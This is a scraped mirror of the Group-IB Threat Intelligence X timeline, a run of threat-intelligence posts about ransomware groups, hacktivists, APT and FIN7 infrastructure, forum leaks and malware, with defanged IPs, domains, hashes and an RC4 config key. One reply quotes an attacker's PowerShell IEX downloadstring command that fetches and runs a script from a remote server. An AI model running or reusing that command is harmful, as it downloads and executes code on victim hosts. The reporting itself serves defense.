Group-IB Threat Intelligence
@GroupIB_TI
Followers
8,855
Following
189
Media
121
Statuses
229
Official account of the @GroupIB Threat Intelligence Unit. Latest research, analytics, IOCs and threat alerts.
Joined January 2023
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
seokjin
• 1514202 Tweets
Hunter
• 1065513 Tweets
#WelcomeBackJin
• 988987 Tweets
namjoon
• 379926 Tweets
MY FAMILY
• 338208 Tweets
Weverse
• 296370 Tweets
MY HOME
• 150645 Tweets
水分補給
• 69587 Tweets
hobi
• 63952 Tweets
CENTURY OF LOVE FINALQ
• 57127 Tweets
ジンくん
• 52999 Tweets
MY SEVEN
• 48469 Tweets
MI FAMILIA
• 48302 Tweets
Botafogo
• 43377 Tweets
YOU ARE MY FREEDOM
• 39852 Tweets
MY OT7
• 37419 Tweets
#WorldDayAgainstChildLabour
• 23365 Tweets
ジャングルポケット
• 23011 Tweets
Saint MSG
• 21124 Tweets
恋人の日
• 20271 Tweets
大谷翔平
• 17593 Tweets
재난문자
• 13446 Tweets
豪邸報道
• 12507 Tweets
Diniz
• 11329 Tweets
ELLE STUNNER WANG YIBO
• 10363 Tweets
On Sunday,
#AnonGhost
, a well-known
#hacktivist
group, exploited an API vulnerability in the
#RedAlert
app, that provides real-time rocket alerts for Israelis. In their exploit, they successfully intercepted requests, exposed vulnerable servers and APIs, and employed Python
4
156
370
On June 17, 2023, a new initial access broker under the alias "Br0k3r" registered on one of the underground forums. The Group-IB Threat Intelligence team has found out that this threat actor is one of the first to conduct private access sales through their own website:…
3
54
138
Group-IB’s Threat Intelligence automatically detects new
#hacktivist
activity, and we’ve seen that threat actor groups are entering the fray and launching attacks on government websites and IT systems amid the escalation in the Israeli-Palestinian conflict. Rest assured, we will…
1
36
138
It is nothing but a slightly modified data sample dumped by another TA on the same forum in July 2023 under the name “Chinese customers data - 2023”. Group-IB’s Threat Intel unit established this connection by searching unusual keywords in this data sample posted by
#ChinaLeak
2
38
128
Group-IB specialists infiltrated
#Qilin
#ransomware
group in March 2023 and now can reveal the inside information on affiliates' payment structure. For ransomware payments totaling $3M or less, affiliates earn 80% of the payment. For payments of more than $3M they get 85%.
6
42
112
The database of the freshly launched
#BreachForums
has been leaked. We checked the data and can confirm the authenticity of the leakage.
Their competitors from exposed[.]vc took responsibility for the leakage.
Both breachforums[.]vc & exposed[.]vc are unavailable now.
The
#ShinyHunters
group and the original team behind
#BreachedForums
have launched a new data leak forum to replace
#BreachedForums
and
#RaidForums
. The new domain breachforums[.]vc was registered on May 29. Meanwhile, the
#Exposed
forum is up for sale.
4
24
61
5
40
108
The Group-IB’s Threat Intelligence team has discovered a potentially new legitimate tool in the possession of the
#MuddyWater
group. The files with the SHA1 hashes: 69f68529e07f2463eb105cfc87df04539e969a56 (attachments./zip) and 81c06183b1bb146f5f1a5f1d03ac44fa9d68d341
1
34
105
When cybersecurity researchers work together, they make the world safer🤝 Group-IB and
@bridewellsec
are proud to share the joint blog post about previously unknown infrastructure belonging to
#APT
#SideWinder
:
1
27
91
In June 2023, Group-IB specialists infiltrated the
#NoEscape
#ransomware
group and uncovered inside information👀
NoEscape ransomware affiliates' panel includes sections for:
Dashboard
Clients
Lockers
Support
Observers
News
Profile
3
34
88
The new
#ObserverStealer
has been published on the XSS forum.
The TA offers
#Stealer
+
#Loader
+
#Grabber
for rent ($150 per month). This malware runs on OS from Windows 8.1 to Windows 11.
1
35
86
#Farnetwork
is a prolific threat actor that played different roles in five
#RaaS
programs in the last four years. It has remained largely unnoticed – until now. Join us in a journey as we uncover farnetwork's covert operations in our latest blog post:
2
29
81
In August 2023, Group-IB’s experts successfully infiltrated the
#Knight
#ransomware
group (also known as
#Cyclops
2.0), exposing valuable insider information.
1
27
81
New global
#Ransomware
threat uncovered as
#ShadowSyndicate
is unmasked as a potent Ransomware-as-a-Service (RaaS) affiliate in a Cybercrime Fighters Club investigation conducted by
@GroupIB
,
@bridewellsec
, and independent researcher
@MichalKoczwara
. New blog post details global…
0
37
77
#Silence
gang started a new campaign and deployed few
#CobaltStrike
servers:
tsvsnjv[.]com
rokllofrold29[.]com
rokllold279[.]com
Attribution is based on CS watermarks and the unique domain names template. Final stage is a ransomware, possible types:
#CL0P
,
#bl00dy
.
1
24
72
New
#HsHarada
#CobaltStrike
server: 103.35.190[.]215. Fully aligns with the heuristic described by us earlier
82.117.254[.]222 hosts a specific
#SSL
certificate with jarm 2ad2ad16d2ad2ad00042d42d00042ddb04deffa1705e2edc44cae1ed24a4da issued by . Additional
#CobaltStrike
watermark 391144938 gives confident attribtuion to
#HsHarada
servers.
Old server:…
1
10
26
4
27
68
On Oct 8,
#hacktivist
group
#CyberAv3ngers
in their Telegram channel claimed to have successfully attacked
#Dorad
power plant (pic. 1). Group-IB’s Threat Intelligence team has discovered that the information posted by CyberAv 3ngers is data that was stolen by the
#ransomware
…
3
30
66
Group-IB’s Threat Intelligence team identified new infrastructure used by
#APT
#MuddyWater
. We also uncovered that this group uses
#SimpleHelp
, a legitimate remote device control and management tool, to ensure persistence on victim devices:
1
14
63
The
#ShinyHunters
group and the original team behind
#BreachedForums
have launched a new data leak forum to replace
#BreachedForums
and
#RaidForums
. The new domain breachforums[.]vc was registered on May 29. Meanwhile, the
#Exposed
forum is up for sale.
4
24
61
Susp
#APT
#TA428
activity. Our team has discovered a
#PhantomNet
(
#SManager
), which was uploaded to VT from Singapore:
C2: associate[.]feedfoodconcerning[.]info:443
associate[.]freeonlinelearningtech[.]com:443
associate[.]freeonlinelearningtech[.]com:8443
2
16
61
#Phoenix
#keylogger
has returned. On Monday the actor "koeir" on XSS forum announced new version of Phoenix Revolution
#Stealer
(coded in C#). This Stealer was active in 2019-2020. It runs in memory, weighs less than 300 KB.
1
18
50
Group-IB's Threat Intelligence team has detected a new server 20[.]222[.]6[.]225 set up by the actor behind
#SilentSkimmer
campaign. The group, recently discovered by The
@BlackBerry
Threat Research & Intelligence team, remains active and continues
#magecart
attacks.
2
21
53
New potential
#FIN7
infrasctructure was detected:
178.128.59[.]129 (
#CobaltStrike
C2)
79.137.192[.]1
theonecorp[.]live (reg date 2023-08-02)
2
15
50
The
#GoldDigger
family grows: Group-IB's TI Unit finds GoldPickaxe.iOS, the first
#iOS
#Trojan
harvesting
#FacialRecognition
data for unauthorized bank access, targeting
#APAC
. It is linked to the GoldDigger family discovered last October. Learn more:
2
24
46
Group-IB TI team detected that:
1)
#404TDS
moved from distributing malicious links via email to injecting malicious code into compromised websites to redirect visitors
2)
#SocGholish
cybercrime group uses
#404TDS
infrastructure as 3rd party provider to deliver their initial stage…
1
18
47
1/3
#GoldFactory
, a notable actor, described in our blogpost (), leverages 2 different sophisticated tactics based to distribute its
#iOS
#Trojans
. Look at this scheme:
2
20
45
In March 2023, Group-IB’s Threat Intelligence team infiltrated the
#Qilin
#ransomware
group and shared some info on their RaaS program. In our new blog post we provide a detailed breakdown of the group and recommendations on how to prevent Qilin’s attacks:
Group-IB specialists infiltrated
#Qilin
#ransomware
group in March 2023 and now can reveal the inside information on affiliates' payment structure. For ransomware payments totaling $3M or less, affiliates earn 80% of the payment. For payments of more than $3M they get 85%.
6
42
112
2
12
43
Group-IB Threat Intelligence team uncovered a previously undocumented spear
#phishing
campaign carried out by
#APT
#SideWinder
between June and November 2021:
@t3ft3lb
2
7
40
The TA
#Sargon
offers a monthly subscription to a previously unknown
#Android
#Trojan
named
#Tremendous
. The TA published an advertisement on XSS Forum with a video demonstrating how the Trojan controls 143 infected devices primarily from the US, Canada, and Europe
3
11
37
From late 2023 to early 2024,
#SharpPanda
has continued to target government entities in the Southeast Asia. Group-IB researchers have spotted several initial infection vectors (documents/executables) similar to previous Sharp Panda operations. These malicious files deliver the…
0
20
37
Recently,
@WhichbufferArda
shared information about
#FIN7
’s infrastructure that used to deliver POWERTRASH loader and Diceloader. We noticed the unique characteristics of these servers, which allowed us to get additional servers, presumably owned by FIN7.
FIN7 infrastructure used to deliver POWERTRASH loader. According to
@CISACyber
same infrastructure used to exploit CVE-2023-27350 PaperCut.
@h2jazi
@MsftSecIntel
2
20
86
1
15
35
Hacktivists are generally associated with conducting small-scale DDoS attacks and defacement. However, as the ongoing conflict shows, their actions can be far more devastating and costly. It’s essential to map and properly mitigatу the risk of hacktivism as part of a threat…
2
6
33
In November, the Group-IB TI team introduced you to GambleForce, a new
#ThreatActor
targeting 20+ various websites across
#APAC
. To learn more about the group’s tools and get relevant indicators of compromise (IoCs), read our blog:
1
19
35
#Nuclear27
is an eco
#hacktivist
group that emerged in August 2023. Since Aug 26, in their only campaign to date, they have been allegedly exploiting hardcoded credentials for the SkyBridge router web panel. Group-IB has found 62 confirmed victims located exclusively in
#Japan
2
14
33
Thanks to
@WhichbufferArda
's finding about IP-address 94.140.114[.]173 used by
#FIN7
(POWERTRASH - Diceloader), we found some additional servers with the same unique configuration:
65.108.19[.]236
194.180.158[.]104
199.80.55[.]21
185.225.17[.]140
195.123.240[.]219
91.134.14[.]26
I found some infrastructure overlaps between FIN7 and UNC2633. The IP address 94[.]140[.]114[.]173 was employed by FIN7 (POWERTRASH - Diceloader) also used by UNC2633 to deliver QakBot malware.
CC
@BushidoToken
Here are the details :
2
28
101
1
6
32
Latest update into
#BreachForums
. Data about yesterday’s hack breachforums[.]vc has been posted on the seized domain breached[.]vc. The data includes a leaked database and a file containing the encrypted IP addresses of all forum members. We have checked the IP addresses and can…
1
10
30
What is known so far about the
#3CX
desktop app supply chain attack? The Group-IB Threat Intelligence team has put together the results of its analysis of the incident, important recommendations for 3CX customers, and a list of IOCs. Read 👉
#3CXpocalypse
0
6
31
Sharing some info on the
#EagleCyberCrew
. This
#hacktivist
group has been active since December 2, 2022. The group has managed to carry out more than 200 attacks worldwide, mostly defacement and, to a lesser extent, DDoS.
The top three most affected countries were India,…
0
11
28
Thanks for the interesting research! Sharing what else we have found in the mentioned
#opendir
of the
#MuddyWater
group👇
1. Venom.exe: another proxy tool ()
2. Сonfig.jsp:
#webshell
with the ability to:
▪️ execute shell commands via…
2
9
27
🕵️♀️ Exposing the
#DarkWeb
deception. Since October 2022, the
#ThreatActor
known as "resetmyname" has been falsely advertising "unique customer databases" from numerous
#banks
on various Dark Web platforms. Regularly announcing "new bank customer databases" from many countries…
0
10
26
82.117.254[.]222 hosts a specific
#SSL
certificate with jarm 2ad2ad16d2ad2ad00042d42d00042ddb04deffa1705e2edc44cae1ed24a4da issued by . Additional
#CobaltStrike
watermark 391144938 gives confident attribtuion to
#HsHarada
servers.
Old server:…
2/2 Instead of smb beacon for lateral movement they just run the same posh script on every new host "powershell IEX (new-object net.webclient).downloadstring
http://82.117.254[.]222:80..."
0
2
4
1
10
26
Amidst the ongoing
#MiddleEastConflict
, Group-IB's
#ThreatIntelligence
team has been closely monitoring the digital realm. Discover the Week 1 overview of
#hacktivist
operations, prime targets, and more in our latest blog post: 👉
#CTI_ISRPAL
…
1
17
26
According to
@vxunderground
, the
#RaidForums
database has been leaked. The Group-IB Threat Intelligence team confirms the leakage, as we compared it with our parsed data from the forum.
The RaidForums database has been leaked online. It has information on 478,000+ users.
It was leaked on Exposed - an up-and-coming forum wanting to fill the void Breached left.
The administrative staff of Exposed would not tell us the source of the RaidForums database leak.
21
201
914
2
8
24
It's teaser Friday!
🤔 Should we hire him? What do you think?
3
6
21
Discover the firsthand insights into our W3LL Done report from Martijn van den Berk, our Junior Cyber
#ThreatIntelligence
Analyst. Watch Martijn's presentation at the VB2023 conference to delve into the details of the W3LL Done group and the market impact of the W3LL threat…
7
7
21
Following Group-IB's
#GoldFactory
report, it is clear that situation of mobile threats in
#APAC
persists. Though the report shared mainly on the "Gold-prefixed" trojans, the prevalence of
#Gigabud
in the region is not to be overlooked. There are increased sightings of Gigabud,
1
8
18
TA alleges that the CVSS score for this
#vulnerability
is 10.0, but based on the description, such a vulnerability would have a CVSS score, at most, of 8.8 The current price for the exploit is $200K (originally it was $1M), which is also quite high for a Windows LPE vulnerability
3
6
17
In June 2022, the Group-IB Managed Extended Detection and Response (
#MXDR
) solution successfully detected and blocked an email carrying a malicious attachment. This email was intended for Group-IB’s employees:
1
5
17
Global geopolitical conflicts frequently serve as catalysts for
#hacktivist
activities. In a comprehensive overview,
@GroupIB
specialists have traced Mysterious Team Bangladesh’s attacks, uncovering their timeline and distribution. Check out or new blog:
1
7
15
🎉 Today marks the 1st anniversary of our
#ThreatIntelligence
unit's X account. This is our 200th post, and it's without any IOCs — sorry 😁
Thank you, guys, for your trust and support! We're thrilled to be part of the global
#CTI
community and to investigate adversaries…
0
6
15
The leaked
#breachforums
[.]vc database contains information about 4,202 users. User entries contain 2 IP addresses: the one they used to register and the other from which they last logged on to the site.
Distribution of IP addresses (used for registration) by type👇
0
4
12
The app () has been removed from the Google Play Store and cannot be launched at the moment. You can find a cached version of the app’s page here:
After exploiting an API vulnerability, threat actors were able to send spam messages…
0
6
13
Week 2 of analyzing
#cyberactivity
surrounding the conflict in the Middle East:
#DDoS
, defacement attacks remain vector of choice for
#hacktivists
. Find more details in our blog:
#CTI_ISRPAL
#Cybersecurity
#ThreatIntelligence
1
9
13
Check out Group-IB's fresh blog post to get the indicators of compromise associated with the
#TontoTeam
campaign and the detailed analysis of the tools, techniques, and procedures (TTPs) of the
#threat
actor:
#APT
0
4
13
Mining money must be funny. But not for
#cryptojacking
victims. Group-IB researched a website with over 5M monthly visitors and found a script that downloads a
#cryptocurrency
miner. Read our new blog to learn how Group-IB Managed XDR helped us combat this threat:…
0
7
13
The
#malware
from the OCX
#HARVESTER
campaign has been active since at least mid-December 2022. The TA, dubbed
#mystrobo
, distributed the
#VenomLNK
variant through a password-protected ZIP archive hosted on Google Drive. The corresponding URL and password were provided in a PDF.
1
2
12
This vulnerability was reported to
@WinRAR_RARLAB
which subsequently issued a patch. Make sure to install the latest version of WinRAR:
1
7
11
😅 Just joking, it's a fake
#resume
, for sure. But on a serious note, the Group-IB
#ThreatIntelligence
team has uncovered a group we're calling
#ResumeLooters
. Their main objective? Executing
#SQL
injections on job-seeking and
#retail
sites to snatch up all available information.…
1
5
12
91.134.14[.]26 was mentioned in the research "Fin7 Unveiled: A deep dive into notorious cybercrime gang" as
#Diceloader
/Tirion C2:
0
1
11
Two of these servers were detected in malicious activity earlier.
195.123.240[.]219 was mentioned in CISA's report from 2020 "Ransomware Activity Targeting the Healthcare and Public Health Sector", in connection with
#BazarLoader
and
#Ryuk
:
1
1
11
Operating under the alias Cyclops, this group has targeted 5 companies from various countries since its inception in July 2023:
Australia: 2 attacks
Madagascar: 1 attack
Guatemala: 1 attack
Turkey: 1 attack
1
1
11
#DarkPink
keeps updating their tools. For example, the group’s custom
#KamiKakaBot
module, designed to read and execute commands from the threat actors via Telegram, is now divided into two distinct parts — one that controls the device and the other that steals sensitive data.
1
3
11
#ShinyHunters
are notoriously famous for selling unique databases that they exfiltrate during their hacking activity. You can learn more about this group in Group-IB's blog post:
0
1
11
Thanks to this notification by
@CERT_OPL
, Group-IB specialists found more information about
#Hydra
activity. While we are investigating it, here are the latest indicators. Check out the thread👇
3
2
10
Great research,
@LukasStefanko
@ESETresearch
. Group-IB Threat Intelligence team would like to share some additional indicators. We found them based on the SSL certificates associated with the C&C domains.
#ESETResearch
identified an active and likely targeted Android campaign we attribute to
#StrongPity
.
@LukasStefanko
2
31
78
1
5
10
Affiliates can configure
#ransomware
with company name, ransom amount, timezone, and more using
#Qilin
builder. Intruder can customize ransom note, skipped dirs/files/extensions, killed processes, etc.
0
0
10
The original data was just a Chinese customer database. But
#ChinaLeak
claimed if to be from the Ministry of State Security China
0
1
10
Join us!
#FightAgainstCybercrime
The global fight against cybercrime needs a collaborative effort. This is why we created the Cybercrime Fighters Club, a forward-thinking project that creates a pathway for Group-IB to partner with industry peers to enhance knowledge sharing and jointly research emerging cyber…
3
2
11
0
1
8
Some users were removed from the database, according to the source of the leak. Almost 70% of
#RaidForums
members were registered with Gmail.
0
3
9
The rules section is in the screenshot below👇
1
1
8
#Qilin
is a
#Ransomware
-as-a-Service affiliate program that now uses a
#Rust
-based ransomware to target its victims. Many Qilin ransomware attacks are customized for each victim to maximize their impact. Qilin’s targets are primarily critical sector companies.
1
2
7
In a fresh blog post, the Group-IB Threat Intelligence team analyzes the latest updates in
#DarkPink
’s toolset, evolution of the group’s exfiltration methods, and modifications of their kill chain. Read now:
0
1
7
Group-IB’s Threat Intelligence unit identified the countries and regions with the highest concentration of stealer-infected devices with saved
#ChatGPT
credentials. The top three countries are India, Pakistan, and Brazil.
1
0
7
Some of the servers have already been detected in previous
#FIN7
's attacks, while others haven't. Some fresh results:
176.97.76[.]163
193.233.23[.]176
62.233.57[.]31
65.108.20[.]165
65.108.20[.]101
95.216.251[.]213
1
1
7
Variants include Exe, XP, DLL, DLLReflInj, PowerShell, PowerShellscript, Linux/ESXi. Each variant targets specific OS or uses specific techniques.
1
3
7
The
#stealer
is written in C++. The admin panel is in NodeJS.
Screenshots of the admin panel and the generation of a new build in an exe file👇
1
0
7
The configuration data is RC4 encrypted with the key "L!Q
@W
#E
$R%T^Y&U*A|}t~k" and decrypted in the payload. The RC4 algorithm with the same key was used in malware such as
#Albaniiutas
and
#BlueTraveller
(
#RemShell
). We wrote about it in this blog post👉
0
2
7
In Apr 2024 Group-IB detected server 170[.]130[.]55[.]28 associated with 3 domains: elamoto[.]com, kongtuke[.]com, egisela[.]com.
Domain egisela[.]com was used to deliver
#FakeUpdates
JS script using script tag injected into HTML code of compromised
1
2
7
Using Graph analysis, Group-IB's Threat Intelligence team also found a connection between krispykreme[.]one (used as gate address for JS sniffers) and tk[.]fuxckxp4ss[.]xyz (a
#CobaltStrike
C2 detected in 2020). Based on this discovery TA may have been active since December 2020.
0
9
7
Check out our latest blog post to understand how CVE-2023-38831 is being exploited in the wild and stay tuned for more updates:
#FightAgainstCybercrime
1
2
7
sslwnd64.exe has PDB: E:\20220501\TTT_SharpArrow 7.4\2022LTL\20220618\20220915NewWakeUp_V1.0\_OUT\LoadWin32_x64.pdb
sslwnd64.exe creates an event {D15E0EF3-E26A-4551-8F84-08E738AEC912}
The payload is zlib-packed and located in resources "TTT".
1
3
7